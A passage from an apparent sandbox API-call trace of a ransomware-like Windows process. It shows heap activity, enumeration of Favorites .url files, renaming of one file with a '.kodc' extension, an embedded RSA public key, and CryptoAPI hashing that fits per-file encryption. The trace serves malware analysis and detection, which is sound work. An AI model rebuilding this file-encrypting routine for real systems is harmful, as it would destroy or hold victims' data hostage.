RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7fa8 [0101.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.477] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.478] GetCurrentThreadId () returned 0x42c [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8028 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0101.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.482] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.483] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.483] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.483] CloseHandle (hObject=0x5cc) returned 1 [0101.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0101.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0101.484] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.kodc")) returned 1 [0101.486] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0101.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0101.486] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0101.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.488] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=134) returned 1 [0101.488] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.491] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.491] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.492] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x86, lpOverlapped=0x0) returned 1 [0101.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.493] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0101.494] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.494] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.494] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.494] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.494] GetLastError () returned 0x0 [0101.494] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.494] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0101.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.494] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.494] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.494] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.495] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5f68 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5fb0 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.496] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8028 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8010 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.497] GetCurrentThreadId () returned 0x42c [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8038 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.498] GetCurrentThreadId () returned 0x42c [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8040 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.500] HeapFree (in: 